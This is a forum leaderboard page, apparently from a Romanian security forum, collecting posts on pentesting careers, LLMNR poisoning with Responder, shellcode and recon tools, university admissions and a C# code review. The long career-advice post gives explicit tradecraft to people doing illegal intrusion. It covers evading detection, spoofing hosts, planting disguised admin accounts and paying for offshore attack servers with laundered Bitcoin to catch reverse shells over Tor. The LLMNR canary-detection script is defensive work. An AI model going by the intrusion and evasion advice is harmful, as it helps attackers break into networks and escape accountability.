
Leaderboard

Popular Content

Showing content with the highest reputation on 06/26/17 in all areas

  1. Hello everyone. I joined this community a while ago; I have/had been a lurker for even longer. A huge part of what made the hacker community what it was (and what it is here) involves a willingness to share knowledge (without spoonfeeding). I would feel remiss if I gained so much from so many of you and did not give something back on occasion. What follows are anecdotes, opinions and observations I can share after almost 7 years working professionally in the InfoSec/NetSec field. Most of my work in this sphere has been anchored in Penetration Testing. Even when my official designation was Network Security Analyst, I spent most of those 3 years in engagements against PCI environments utilized for subcontracting work from Comcast, Verizon, Time Warner, Sprint and AT&T (to name a few of my former employer's clients). Currently, I manage the Cybersecurity Lab of an international company that employs over 200,000 people. Most of my work in my current position involves Penetration Testing (every type imaginable, including focused blackbox testing against embedded devices and the network/control structures surrounding them). I am also a lead point of contact for our international teams during remediation and triage of major security threats, incidents and breaches. For example, I was my company's head analyst for the recent Shamoon 2.0 attacks (W32.DisttrackB/W97M.Downloader) last February, as well as the recent WannaCry outbreak. I also serve in a Security Engineer capacity, as I am regularly asked to evaluate facets of our products and provide feedback and opinions on the security ramifications involved. I am extremely busy and wanted to give back what I have taken thus far, so this is going to be long... Here goes nothing:

1) I am completely self-taught (meaning I acquired no college/formal education to get where I am).
That being said, a solid Computer Science degree is invaluable as a base (I would generally avoid Cybersecurity degrees and go for CS), and even the degree itself will open doors into this business. Also, I work alongside high-level engineers (CS and Electrical Engineering PhDs); what they can do in a short period of time once they take an interest in InfoSec/NetSec is frightening.

2) That leads me to this: to be great in this industry (or great for this industry), I believe that InfoSec/NetSec has to become a lifestyle, not just a job. I easily work 80+ hours a week (every week) between work, further study and skills building. And I love just about every minute of it. There is a huge need for InfoSec/NetSec professionals, which I feel is going to lead to a flood of low-knowledge, low-passion, low-skill hiring. Anyone trying to get into this industry for the cash alone is going to have a rude awakening: there are probably lower-pressure, lower-work-hour ways to earn the same money doing something that actually interests you. Also, those of us really invested in these arts can pretty easily spot our own.

3) Learn to study, and learn to love the act of studying. Much of this job is continual study; eventually, when presented with an issue you are ignorant of, you will feel confident in knowing that you can find the answers you need. Break the issue into small, manageable pieces (goals really), and put the pieces together until you can view the whole answer.

4) Most of my success in this industry has been due to a willingness to work hard, persevere and never give up. Ever. Most of this job is the creative solving of problems that do not or may not have any easy answer (or any answer at all... yet). You have to build a no retreat, no surrender, obsessive need to conquer problems.

5) I specialize in network penetration, though I have become fairly well rounded. To me, network penetration is the art of acquiring advantages.
During an engagement, I am always looking to acquire advantages. I study and train to better recognize and maximize the resources within an environment that allow me to gain those advantages. Gaining these advantages is more a product of knowledge and experience than an application of tools.

6) I am also looking to be efficient; the best penetration tests replicate real-world attacks. In that vein, each action you take raises the probability that you will be detected. For hackers and freedom fighters engaged in illegal activity, you may want to consider the latter a bit. Once you make ingress and launch any manner of offensive action, you have escalated the legal ramifications of your trespass by multiple magnitudes. Also remember that the probability of you getting caught and prosecuted is never 0.00%: you have to be prepared, you have to be careful, you have to be patient and you have to prepare contingencies.

7) I use a measurement/assessment of risk vs. reward to make each action within the network as efficient as possible; by percentages, losing a queen to take a rook is generally a loser's bet. The best way I've learned to temper a careful approach is with an old sales slogan ("Always be closing the deal", which I modified to "Always be advancing your position(s)").

7) I try as much as possible to engage a target as a stalking, ambush predator: I move carefully and try to use the environment to hide myself as I seek to exploit the target's/objective's lack of awareness. I work to remain patient and identify/quantify as many of the variables of the current environment/situation as possible. Sometimes the best decision you can make is to slow down or hold your current position for a bit; watching Tcpdump or Wireshark while thinking on a better move is still advancing your position.

8) To lower the probability of detection (whenever possible) I attempt to attack, enumerate or probe from an obfuscated position.
Configuring your attack host/node for the highest probability of situational anonymity (using tunneling, proxies, encapsulation, etc.) is infinitely useful in pentesting, hacking and/or general security/privacy. Mastering the manipulation of proxy, tunneling and encapsulation protocols (which involves a deep understanding of networking/TCP/UDP) almost lends you quasi-magical invisibility and teleportation powers when involved in network penetration. Obfuscation itself is one of 10,000 reasons why experience/knowledge in the disciplines of networking, OS and programming combined with security research are such huge advantages (and another reason why if you take up this path you may never stop learning).

9) Learn to use every tool you can, but more importantly, learn why the tool works. If you work in/at exploitation long enough, the principles governing the tools will help you exploit a box someday, regardless of whether you use that particular tool to get the wanted/needed result.

9) Knowledge/experience over tool use is especially important today: regardless of what many sites say, you will not find many enterprise/corporate networks today (as a professional penetration tester at least) where there are gross configurations/deployments leading to an easy, out-of-the-box (deploy tool == Meterpreter) exploitation.

10) When training for a fight, professional mixed martial artists put themselves in the worst possible positions so they react properly when the fight is underway. Eventually, training/practicing your exploitation/research techniques the same way will be a huge boon in engagements, POCs (or in the wild). I especially like to round difficulty up during research; it is difficult for someone else to minimize your findings if you have added (and circumvented) greater security measures than the norm (rather than having reduced them).
11) Most of my exploitation of networks in the last couple of years has been a process of discovering network misconfigurations and weaknesses (especially in Windows Firewall, Programs and Features, LGPO/GPO policies and/or IE/Internet Options within Windows domains/networks) or information leaks that I locate online or through DNS enumeration that ultimately lead to my gaining access to a host. From there, remote exploitation (toward post-exploitation/privilege escalation/pivoting) will often occur. This is largely when knowledge of things such as PowerShell (leveraged by itself or with tools like PowerSploit/CrackMapExec/PsExec/Empire) becomes invaluable (in Windows networks). I have actually been finding easier remote exploits when attacking Linux/Unix boxes in enterprise networks (finding Solaris with Apache Tomcat during enumeration still springs hope eternal in my human breast). Many (actually, maybe all) of these companies are/were new at deploying Unix/Linux boxes in their networks and were making some serious mistakes with deployment.

12) Enumeration is the most important part of an engagement to me. You should get used to enumeration without automated tools; I love Nmap, but many times it is not feasible to use within the customer's network (network overhead issues, the chance of detection by IDS, the chance of breaking PLCs or other embedded devices, etc.). In cases where you are on the customer's network, tools like Wireshark, Tcpdump, knowledge of networking protocols/ports and banner grabbing are your friends.

13) For those engagements where you first need to gain access to the network, you definitely have more room for running some louder tools: I love Fierce (and DNS enumeration in general) as it often presents my way in. Google dorking is still also an incredible tool, as is Firefox with the right set of extensions (Hackbar, Tamperdata, Wappalyzer, BuiltWith, Uppity, IP Address and Domain Information, etc.). Who loves Dirbuster in these circumstances?
This carbon/caffeine-based lifeform right here. Whether you are pentesting, bughunting or hacking/freedom fighting, a paid Shodan subscription ($50) is worth every cent. The capacity to make exacting, accurate searches for greater than five pages has helped me in more engagements/bughunts than I can remember.

14) When I am explaining why a config/setting/LGPO/GPO (etc.) is a security risk to a client or my fellow employees, I like to explain that many of the advantages I look for in my environment are most often advantages that are needlessly provided to me. If it does not break key functionality or seriously impede efficiency/development time, then it is in their best interest to deny me as many advantages as possible, even when the advantages appear as if they are minutiae. When dealing with a client or non-security fellow employees, you should work to create a relationship of mutual help and teamwork. I am not there to rub their noses in their crap; I am there to help improve their security so the company can prosper. This is partially a customer service gig where solutions (remediation/countermeasures) are more beneficial to the customer than the exploitation itself. Whenever possible, I like to end the post-exploitation/penetration test conversation/meeting/presentation with the attitude that I am here to help fix these issues: how can WE best close these gaps? How can I help make your (or our) company safer, so that we can become more prosperous?

15) I personally despise Microsoft (and many proprietary products/companies) on many levels, but when it comes to work, I am platform agnostic. Whatever tool is needed to complete the mission is the tool I am going to employ. However, whenever possible without jeopardizing the mission, I am going to employ an Open Source/Unix/Linux-centric solution. I work hard to show my company the value in Open Source.
The way to show that value isn't to be the super Unix/Linux/GPL neckbeard who constantly bemoans proprietary software/platforms. The best way (for me) is to show how effective the strategy involving the Open Source tool is. Then, in my report, I explain the business hook of using Open Source (if the tool is free for commercial use). I am sensitive to companies taking Open Source tools and turning them into something proprietary. However, if I can make my company (which is both huge and almost universally recognized as ethical, which is rare) see the value in Open Source, I know they will eventually incorporate Open Source into the support packages for their products (which they have, while keeping the tools and the license intact). This then spreads the value of Open Source to smaller companies who see it being trusted by a much larger company.

16) I have tens of thousands of dollars worth of licenses at my disposal. However, I will never use tools like Nexpose, Nessus, Canvas or Metasploit Pro unless the project, client, or a governing body specifically require them. I believe these tools develop poor habits. Obviously, if a project such as evaluating an entire domain of IPs/hosts for vulnerabilities is my task, I am going to use Nessus. However (whenever time/the project permits, which they most often do), I am going to evaluate the findings (and search for other vulnerabilities) manually.

17) The ultimate goal should be reliance on nothing more than a Linux/Unix terminal, some manner of network access and a programming language. One of my favorite exploitation tools is my Nexus 7 2013 flo tablet (running a modified version of NetHunter) and a Bluetooth folio keyboard (I got the idea from n-o-d-e, https://www.youtube.com/watch?v=hqG8ivP0RkQ) as the final product is a netbook that fits in a jacket pocket.
I have exploited some seriously huge clients with this little rig (for ingress and a quick root shell, WPS on network/enterprise printers and knowledge of PCL/PJL/PostScript are often your friend). I have also exploited other customers with a cheap UMX smartphone with 5 gigs of storage, 1 GB of memory and GNUroot Debian (guest WiFi access from the parking lot or an onsite public restroom, human nature, and Responder.py analyze mode, followed by WPAD, LLMNR and NetBIOS poisoning with NTLMv1 and LM authorization downgrade for the win).

18) During (red team, onsite, etc.) engagements, even when the ultimate target of the engagement is located on a hardwired network with heavy segmentation/compartmentalization (such as the conduit/zone-based layouts that are general best practice in industrial sectors), it is always worth gaining a host/node with corporate WiFi access. One thing WiFi access provides is reach: an Administrator's (or other privileged user's) dedicated workstation may be out of reach, but his other devices (if in scope) may be connected to corp. WiFi for reasons such as saving data on a plan. Also, WiFi allows me attacks of opportunity even when I am doing other things. Running Responder.py on a misconfigured network's WiFi while I am otherwise engaged is gaining me advantages (maybe clear-text creds, maybe hashes, maybe NTLMv1 and LM hashes) at little cost to my time or attention. When I employ this, I like to spoof the poisoning machine's hostname/MAC address to something familiar on the network. If you see a bunch of hosts named "Apple" during your recon, and all of those hosts are not online, spoof the hostname/MAC to match one of the Apple machines (this will not withstand close scrutiny, but will often suffice with a little work). It always helps to watch and take note of the norms of the network traffic and protocols. Try to match this as much as possible (this will likely help you avoid IDS/IPS, firewall rules, etc.)
and whatever traffic would seriously stand out, try to tunnel or encapsulate with normal network traffic/protocols.

19) This leads to two other points: A) Be prepared for the majority of people within a company who do not care about, or will minimize, security issues. Do not get frustrated; I find showing the parties involved what they stand to lose as a company from a vuln to be more effective than focusing on the vuln itself. This is where the Nexus and cheap smartphone come into play: taking the client's domain with a laptop may scare up some results, but showing a customer that an attacker could cost them tens of millions with a $20 smartphone or a $100 tablet (from the parking lot) works wonders. C) I have an interest in learning to exploit everything and anything. This has served me well during network penetration tests, as many targets will defend their DCs, file servers and hosts, but not pay much attention to the printers and IoT devices within the network. D) To this end, learn to work with uncommon protocols. UPnP, NTLDNA and SSDP have been serving me well for the last couple of years. Many file servers (and company smartphones/tablets when they are in scope) keep the UPnP door (and associated protocols) wide open. I once grabbed SNMP and other default network appliance creds from a file server through UPnP.

20) If you are going to pay for certs with your own cash, I recommend the OSCP. Yes, some of the machines/exploits are outdated. You won't find many of the SMB remote exploits used for the course in the wild very often anymore (unless an admin leaves a test server up, which happens occasionally). However, the overall experience, breakdown of enumeration methodology, self-reliance and mindset the entire experience teaches you are invaluable. I have seen some sites peddling garbage certs with no industry recognition. Save your money for the OSCP; its profile in the industry is high and growing.
Certs are no replacement for experience, but starting out with an IT/CS-related degree or some general IT experience (even helpdesk work) along with the OSCP will get you hired somewhere.

21) For persistence, I prefer adding innocuous user accounts/Remote Desktop accounts. If I am going to add some manner of privileged user account early to mid engagement, I usually try to add a more low-profile account (if I have the option) such as Server Operator; these types of accounts allow privileged access you can build from, but generally are not watched with the scrutiny of an Administrator account. When I do create Administrator accounts (I try to wait until I begin my endgame), I will try to match the naming convention to similar accounts within the network. For example, if the Administrator accounts within the network are named USsupervisor, I will name the added account something like USupervisor. If I know the clear-text password of the account I have mimicked, I will use the same password.

22) Keep good notes during the engagement; too much information is better than too little information. Captured PCAPs of network traffic are great for examination during downtime between engagements.

23) If you are a hacker, freedom fighter, or someone generally concerned about max privacy, this series of articles and configurations is for you: https://www.ivpn.net/blog/privacy-guides/advanced-privacy-and-anonymity-part-1

24) My favorite distro is BackBox; it starts out with a solid set of tools minus the obscure bloat (and so far I have been able to add anything Kali has to BackBox). You can use BackBox's "Anonymous" option for a full transparent Tor proxy, Macchanger and hostname changer, and set RAM to overwrite on exit. I also keep Portable VirtualBox on a USB drive with a Kali Linux image...
You could follow some of the advice here: http://www.torforum.org/viewtopic.php?f=2&t=1832020 And here: http://www.torforum.org/viewtopic.php?f=2&t=1832020 The articles above could help you create an encrypted USB with a Whonix gateway and Kali Linux workstation (you could probably exchange the Kali OS in the Whonix Workstation for any Debian/Debian-like OS). This configuration is disposable and concealable, and will run all of the Kali workstation's (or other Debian/Debian-like OS's) traffic through Tor. You could also create multiple other vanilla Whonix Workstations/Gateways on the USB to create a type of local jumpbox sequence to tunnel between/through SSH and/or VPN them before the final Kali workstation. (Note: This is just a gut feeling, but for your own OpSec/security/anonymity, you are probably best replacing the Kali workstation with another Debian/Debian-like distro. I have tried Katoolin in the Whonix Workstation, but I find that Katoolin often breaks it.)

25) A VPS with your pentest tools installed is a valuable commodity; I call mine DeathStar, and I can call down some thunder from my Nexus 7 2013 flo (and a prepaid wireless hotspot) from pretty much anywhere. There are some providers who do not give a damn about the traffic leaving your VM as long as you are using a VPN and a DMCA does not come their way. For hackers and freedom fighters, get your VPS from a country outside the 14 Eyes countries (providers in Eastern European/former Soviet Bloc countries can be both dirt cheap and extremely honorable; just do your research and have tolerance for the occasional technical issue). You could pay with laundered/tumbled Bitcoin; even better are those providers who accept gift cards (much like some VPN providers do) as payment. Have another party buy the gift cards a good distance away from you; you can find some of these providers who take gift cards on Low End Box.
The VPS can be a valuable addition to the encrypted USB above (as you now have a host/node to catch your reverse shells without sacrificing Tor) when combined with SSH or IPsec (such as strongSwan, which is in the Debian repos).

26) Again, this post was long because I am busy, and I wanted to make the contribution I felt I owed this site since shortly after it began. If you have technical questions concerning this (or any questions in general), please post them as comments and I will definitely get you back an answer. https://0x00sec.org/t/shared-thoughts-after-6-years-in-pentesting/2492
    5 points
  2. Going Further with Responder's Basic Authentication

There are a good number of situations when we find ourselves abusing the LLMNR and NBT-NS protocols on an infrastructure penetration test, more specifically on an Active Directory setup. These 2 protocols are enabled by default on most Windows operating systems. What they do is facilitate communication between network machines when searching for a DNS hostname, regardless of whether it's a share, a server or a web hostname. The overview picture of the attack vector:
- the victim is looking for a non-existing hostname
- the DNS server cannot resolve the request
- we reply and resolve the hostname resolution query
- we ask the victim for authentication
    3 points
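The defender-side counterpart of the attack vector outlined in that post, as an added example (not Responder's code and not part of the original post): a canary LLMNR query for a hostname that does not exist. On a clean segment nobody answers it, so any answer identifies a host that responds to names it does not own. The canary name and the address 10.0.0.66 are constructed values; the parser runs offline against a constructed reply.

```python
"""LLMNR canary check: a hostname that does not exist must get no LLMNR answer,
so any answer reveals a host responding to names it does not own (a poisoner).
LLMNR reuses the DNS wire format on UDP 5355, multicast group 224.0.0.252."""
import random
import socket
import struct

LLMNR_GROUP = "224.0.0.252"
LLMNR_PORT = 5355


def encode_name(name):
    """Encode a hostname as DNS labels: length byte + label, terminated by 0."""
    out = b""
    for label in name.strip(".").split("."):
        raw = label.encode("ascii")
        out += struct.pack("B", len(raw)) + raw
    return out + b"\x00"


def build_llmnr_query(name, txid):
    """LLMNR query for an A record: header (flags 0, QDCOUNT 1) + one question."""
    header = struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0)
    question = encode_name(name) + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN
    return header + question


def parse_llmnr_response(data, expected_txid):
    """Return the IPv4 answers in an LLMNR response to our transaction id,
    or [] for anything else (wrong id, a query, truncated packet)."""
    if len(data) < 12:
        return []
    txid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", data[:12])
    if txid != expected_txid or not flags & 0x8000:  # QR bit clear: not a response
        return []

    def skip_name(pos):
        # Walk labels; a 0xC0 pointer (DNS compression) is always 2 bytes.
        while True:
            length = data[pos]
            if length == 0:
                return pos + 1
            if length & 0xC0 == 0xC0:
                return pos + 2
            pos += 1 + length

    off = 12
    for _ in range(qd):
        off = skip_name(off) + 4  # skip QTYPE + QCLASS
    answers = []
    for _ in range(an):
        off = skip_name(off)
        rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", data[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            answers.append(socket.inet_ntoa(data[off:off + 4]))
        off += rdlen
    return answers


def poisoner_suspected(response, txid):
    """The canary name must never resolve; any A answer is evidence of poisoning."""
    return len(parse_llmnr_response(response, txid)) > 0


def probe_network(canary="canary-x7q2-doesnotexist", timeout=2.0):
    """Send the canary query to the LLMNR group and return {responder_ip: answers}.
    An empty dict means nobody answered, which is what a clean segment looks like."""
    txid = random.randint(0, 0xFFFF)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_llmnr_query(canary, txid), (LLMNR_GROUP, LLMNR_PORT))
    responders = {}
    try:
        while True:
            data, (src, _port) = sock.recvfrom(512)
            if poisoner_suspected(data, txid):
                responders[src] = parse_llmnr_response(data, txid)
    except socket.timeout:
        pass
    finally:
        sock.close()
    return responders


def sample_poisoned_response(txid, canary="canary-x7q2-doesnotexist"):
    """Constructed sample of a poisoner's reply: QR bit set, our question echoed,
    one A answer (name given as a compression pointer to offset 12) pointing at
    the made-up address 10.0.0.66."""
    header = struct.pack(">HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    question = encode_name(canary) + struct.pack(">HH", 1, 1)
    answer = b"\xc0\x0c" + struct.pack(">HHIH", 1, 1, 30, 4) + socket.inet_aton("10.0.0.66")
    return header + question + answer


if __name__ == "__main__":
    tid = 0x1234
    print(poisoner_suspected(sample_poisoned_response(tid), tid))   # True
    print(poisoner_suspected(build_llmnr_query("x", tid), tid))    # False
```

Run `probe_network()` on a test segment to exercise the live path; on a network where the attack above is underway, the poisoner's address shows up as a responder.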
  3. Shellcode Compiler. Shellcode Compiler is a program that compiles C/C++ style code into a small, position-independent and NULL-free shellcode for Windows. It is possible to call any Windows API function in a user-friendly way. Shellcode Compiler takes as input a source file and uses its own compiler to interpret the code and generate an assembly file, which is assembled with NASM (http://www.nasm.us/). Shellcode Compiler was released at the DefCamp security conference in Romania, November 2016. Link: https://github.com/NytroRST/ShellcodeCompiler
    1 point
  4. /xxx/ is used for regex expressions
    1 point
  5. The big fish have already bought up all the big, good pages; if you have a considerable budget and know what you're getting into, the best solution is to grow a targeted page yourself (FB ads), and the results will be 10x better than throwing money at other people's pages.
    1 point
  6. Ok, at a glance I noticed a whole bunch of problems; I'll list a few:
- No variable, regardless of data type, should be instantiated as null. When it comes to reference types they are already null, and value types will be instantiated with their default values. E.g. value type: int number; - the variable will be 0; reference type: string val; - it will be null, no need for default(string) or to declare it that way yourself.
- The interface must be initialized with the class that implements it, or it can be declared and initialized later. E.g. ICryptoTransform encryptor = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes);
- In .NET any class deriving from Stream implements the IDisposable interface; calling the Close/Dispose methods is reflected in the derived class too, so you don't need to call stream.Close().
Considering I found these errors in a single method of a single class, I think it would be useful to read more about .NET if you're interested in this field. There would be more aspects to discuss, such as error checking, patterns, memory allocation and code reuse. And since I don't like to criticize without giving arguments, I'll leave an example of roughly how the method I'm referring to should have looked (the whole code is probably a mess, but I'll limit myself to what I saw):

    using (var symKey = new RijndaelManaged())
    {
        var ms = new MemoryStream();
        try
        {
            symKey.Mode = CipherMode.CBC;
            ICryptoTransform cryptor = symKey.CreateEncryptor(keyBytes, initVectorBytes);
            using (var cs = new CryptoStream(ms, cryptor, CryptoStreamMode.Write))
            {
                cs.Write(plainTextBytes, 0, plainTextBytes.Length);
                cs.FlushFinalBlock();
            }
            return Convert.ToBase64String(ms.ToArray());
        }
        catch (CryptographicException)
        {
            throw; // bare "throw;" keeps the original stack trace; "throw ex;" would reset it
        }
        catch (Exception)
        {
            throw;
        }
    }

In any case the initiative is praiseworthy, keep going. To begin with, you can start here: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/
    1 point
  7. The Joe who opened the topic: - Potential clients look for him, he doesn't reply to anyone... - Offers backlinks on some sites that aren't actually his, and many other things
    1 point
  8. CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by CloudFlare in the hopes of discovering the location of the server. Using Tor to mask all requests, the tool as of right now has 3 different attack phases:
- Misconfigured DNS scan using DNSDumpster.com.
- Scan the Crimeflare.com database.
- Bruteforce scan over 2500 subdomains.
Please feel free to contribute to this project. If you have an idea or improvement, issue a pull request!

Disclaimer: This tool is a PoC (Proof of Concept) and does not guarantee results. It is possible to set up CloudFlare properly so that the IP is never released or logged anywhere; this is not often the case and hence why this tool exists. This tool is only for academic purposes and testing under controlled environments. Do not use without obtaining proper authorization from the network owner of the network under testing. The author bears no responsibility for any misuse of the tool.

Usage. To run a scan against a target:

    python cloudfail.py --target seo.com

To run a scan against a target using Tor (or, if you are using Windows or Mac, install Vidalia or just run the Tor Browser):

    service tor start
    python cloudfail.py --target seo.com --tor

Dependencies: Python3, argparse, colorama, socket, binascii, datetime, requests

Download: https://github.com/m0rtem/CloudFail
    1 point
  9. http://economie.hotnews.ro/stiri-finante_banci-21835511-peste-saptamana-intra-vigoare-noile-conditii-acordare-scutirii-venitul-din-salariile-programatorilor-vezi-text-conditiile-care-acorda-scutirea.htm http://www.avocatnet.ro/content/articles/id_44601/De-maine-mai-mulți-programatori-vor-beneficia-de-scutirea-la-impozitul-pe-venit.html Opinions?
    1 point
  10. Hi. Since you wrote to me privately and also posted publicly, a few notes, maybe others who are interested will see them too:
- Congratulations for wanting to leave Babuinland! It will probably be one of the best decisions you'll ever make. It doesn't matter where (UK, mainland EU, Scandinavia), as long as you get out of there.
- It's very good that you're looking into options, but at some point you have to be decisive, decide for yourself and accept the "consequences" of your decision. Rather than listening to one guy who has some acquaintance or other, or another who studies something else, or another who graduated X years ago and no longer knows how things stand, or others who are simply clueless and just give their opinion. Note that there are all kinds of league tables and you can see roughly where each university ranks. Then each one has a web page for the department/course where you can see what they offer, requirements, course structure, etc., which will help you make a decision. Other people's opinions are very subjective because they depend on their experience. This is not uniform and depends on many variables. Yes, it can give you an idea, but it can be very misleading, subjective. (I'm referring to choosing the university here.)
- As for applying normally through UCAS or waiting until Clearing (spot admission), that's your decision. You have to weigh the risks and benefits and decide. As the others say, it's probably too late through UCAS, but if that's not an option then you know what you have to do.
- You wrote something, I think, about wanting whichever university is best in the field; their "goodness" is directly proportional to the competition for places and the admission requirements. If you scraped a 5 in maths at the baccalaureate, don't expect to get into something like Cambridge.
- Spot admission (Clearing) is a method for accepting (more or less) the rejects (no offence).
That is, they've filled most of their places and confirmed with those who accepted, and now they're looking to fill whatever places they still have free so they don't run the financial year at a loss. So yes, it's somewhat "easier" from an admissions standpoint, but it's also riskier. But you probably won't have a choice if it's too late.
- How realistic are you about your knowledge, bearing in mind you'll have to do everything in English? If you go somewhere with a high level and by some miracle you're accepted and then go from one failed exam to the next... you won't like it. And universities are judged harshly on completion rate, retention rate and drop-out rate, so they won't risk accepting you if they think they can't get you out the door with a diploma in hand.
https://www.topuniversities.com/university-rankings/world-university-rankings/2018
https://www.theguardian.com/education/ng-interactive/2017/may/16/university-league-tables-2018
https://www.thecompleteuniversityguide.co.uk/league-tables/rankings
http://www.hefce.ac.uk/tefoutcomes/
https://www.timeshighereducation.com/world-university-rankings (aim for the "bottom")
P.S. @aelius, chillax, where I used "fii" it's the present subjunctive
    1 point
  11. I remember that ~6 years ago, when I finished high school, I also applied to some universities in the UK (5 of them: UCL, Essex, Portsmouth, Warwick and one more). I think back then you applied through some platform called UCAS. You had to have everything done and sent by February at the latest (except the English diploma and the grades + transcript from grades 9-12, which obviously you didn't have by then). For what it's worth, the good universities really do take your average into account and couldn't care less whether you desperately want to get there or not. At least, I had a really cool letter of intent, but because of my baccalaureate average I didn't get into Warwick and UCL. The rest, yes. As far as I remember, the grades in the subjects related to the profile you wanted to follow also mattered a lot. For example, if you go for Computer Science, they'll look at the transcript for your averages in Maths/CS/Physics; plus I, for example, had a recommendation letter from my CS teacher, which counted. When you applied through UCAS, you basically had a maximum of 5 options available and paid a modest fee (under 200 lei). Apart from that, back then I joined a programme from EDMUNDO and from there they assigned me a really nice girl who helped me with advice/paperwork/translations/etc. Advice received from others that's worth taking into account:
- over there, cheating doesn't fly like it does here. You got caught, you're out. Period. People are very strict about content. Indeed, over there, a library at some random university looks like the national library in Bucharest. (you have plenty of resources for your homework/projects)
- if you go there, study. It costs 9k pounds/year to study. Don't make your parents struggle just because you heard it's cool to leave and that they smoke weed in Essex until they crack.
    1 point
  12. 1. Are you retarded?
2. The code you entered is never going to work... try with (/letter/) or with (number).
3. Are you retarded?
4. Reported, problem fixed a few days before I posted here
5. money received after a pile of insisting by email and days of stress.
EDIT: https://www.facebook.com/whitehat/
    1 point
  13. reported, fixed, waiting for the money... not a lot of money, but it's ok... enough for a few beers
You're the smart one, God help us! If the guy said it's fixed and reported. Obviously he made the post after notifying Facebook and after Facebook fixed the problem and allowed him to make the disclosure.
    1 point
  14. Know your community – Ionut Popescu
January 16, 2017 SecuriTeam Secure Disclosure Maor Schwartz

When we sponsored DefCamp Romania back in November 2016, I saw Ionut Popescu lecture “Windows shellcodes: To be continued” and thought to myself “He must be a key figure in the Romanian security community – I must interview him”, so I did!

Introduction

Ionut is working as a Senior Penetration Tester for SecureWorks Romania. Speaker at DefCon and DefCamp, writer of NetRipper, ShellcodeCompiler and a family man.

Questions

Q: What was your motivation for getting into the security field?
A: First of all, the security field is challenging. It’s like a good movie whose main character has to do some tricky moves to find the truth – in the security field it’s the same. Second, it’s fun. Getting access to different systems or exploiting applications. Your friends will think you did something really complicated when you actually exploited a simple vulnerability. My motivations were never (and will never be) fame or money; it’s the challenge and learning.

Q: When did you get into the security field?
A: I got my first computer when I was 16. I used it to play games until I found a small Romanian security forum. I saw that there was a lot of challenging stuff you could do and I became interested in the security field. During this process I learned Visual Basic 6 / HTML / CSS / JS / PHP / MySQL and practiced my web application vulnerability research skills. After some time I became interested in more complicated stuff such as C/C++ and ASM. It was step-by-step learning where the more you know, the more you realize you don’t know.

Q: Since you started, you have found vulnerabilities (vBulletin for example) and wrote exploitation tools like NetRipper and ShellcodeCompiler. Why did you decide to specialize in offensive security?
A: Offensive security is the fun part of security. From my point of view, it is more complicated, more fun and more challenging than defensive security. Let’s take the vBulletin example. I managed a vBulletin installation and I wanted to make sure the forum was secure. I always updated with the latest vBulletin patches, our server was up to date and it even had a few hardening configurations – this is defensive security. But when I decided to take a look on my own at vBulletin, I found an SQL Injection. Guess what made me happier – installing patches and keeping a system up to date, or the discovery of an SQL Injection? Since I was young, I was more attracted by the offensive part of security.

Q: Why did you develop NetRipper and ShellcodeCompiler?
A: A long time ago I discovered that by using API hooking (intercepting Windows function calls) you can do a lot of stuff. While working on an internal penetration test on a limited system, I had the idea that I could capture the traffic made by administration tools in order to pivot to other systems. The idea was not new, but the available tools did not offer what I wanted – a post-exploitation tool to help penetration testers on their engagements. So, I started working on NetRipper, which was released at Defcon 23. Recently, being interested in low-level stuff such as ASM and Windows Internals, I wanted to write my own shellcodes. I did it easily on Linux, but it was a little bit more complicated on Windows. I noticed that you repeat a lot of the content from one shellcode to another, so I decided to automate this. This idea was also not new. I saw a basic shellcode compiler, but its users had to write ASM code. I wanted a fast and easy way to write one. This is how Shellcode Compiler was born.

Q: What is the most innovative project you did as an offensive security researcher?
A: I think the most innovative project I did as a security researcher is Shellcode Compiler. Even if the idea is not new and the tool is really limited, it turns a difficult job into a really easy one, and anyone can write a shellcode. However, I still need to implement a few features that will make it more useful. I don’t have a lot of free time to work on this project, but I always try to make some time for it.

Q: Where did you learn to be an offensive security researcher?
A: I started to learn from security forums. I still remember the hacky0u forums. Now I get most of my technical stuff from Twitter. My tweets are actually a “to read” list. I like to see that a lot of technical people share their knowledge. I read anything that’s new from blogs, whitepapers and security conferences. I find Twitter is the central place where I can find all this information by following the right people.

Q: How big is the security community in Romania?
A: The security community in Romania is medium-sized. There are really good security guys in Romania, but many of them don’t have the necessary time to share their knowledge. There are security researchers from Romania that spoke at well-known security conferences and write tools and whitepapers, but not as many as I would like. In my opinion, it doesn’t matter where the researcher is from – we live in an international world, especially the security researchers’ community.

Q: I saw that you are one of the Admins of the Romanian security forum called RST Forums. Why did you open the forum? What was the goal? Who helps you to manage it?
A: RST Forums is the largest Romanian security community. It is a well-known forum in Romania and most of the content is Romanian. I did not open this forum; a few other guys did it in 2006. However, they decided to leave the community, and so I am just continuing it. The goal is to help young and newbie Romanians learn security. I have friends that visited the forums for game cheats or programming help; eventually they got into the security field and now they are working as penetration testers for large companies – the forum helped a lot of us in our careers, and that’s why it is still open. I hope many other young Romanians will use it as a way to start their careers in the field of information security.

Q: How do you support the security research community today?
A: I don’t do as much for the security research community as I would like. The two tools I released, NetRipper and ShellcodeCompiler, were to support the research community. I have written different technical articles and whitepapers and spoken at security conferences. Oh, and I also tweet useful technical stuff. It is not much, but it is something, and I hope someone will find my work useful.

Q: Do you have a tool you are working on today? Do you know when you are going to release it?
A: Right now, I would like to work on my current projects. I don’t have a new idea for a tool, and it is not a good idea to work on one until the other tools are as fully featured and stable as I would like them to be.

It was a pleasure, Ionut, to talk to you and get so much information on the local Romanian community.
You’re welcome.

Link: https://blogs.securiteam.com/index.php/archives/2916
    1 point
  15. May he rest in peace! Of course, all the little pricks with accounts created overnight have no idea about the forum's history and don't know the old members. He was a man with many skills.
    1 point
  16. Windows x86 SwapMouseButton shellcode

/*
    Title: Windows x86 SwapMouseButton shellcode
    Author: Ionut Popescu
    Date: December 2015
    Tested on: Windows 7/Windows 10
    Build/Run: Visual C++ Express Edition

    Shellcode written for educational purposes.

    Detailed description:
    - http://securitycafe.ro/2015/10/30/introduction-to-windows-shellcode-development-part1/
    - http://securitycafe.ro/2015/12/14/introduction-to-windows-shellcode-development-part-2/
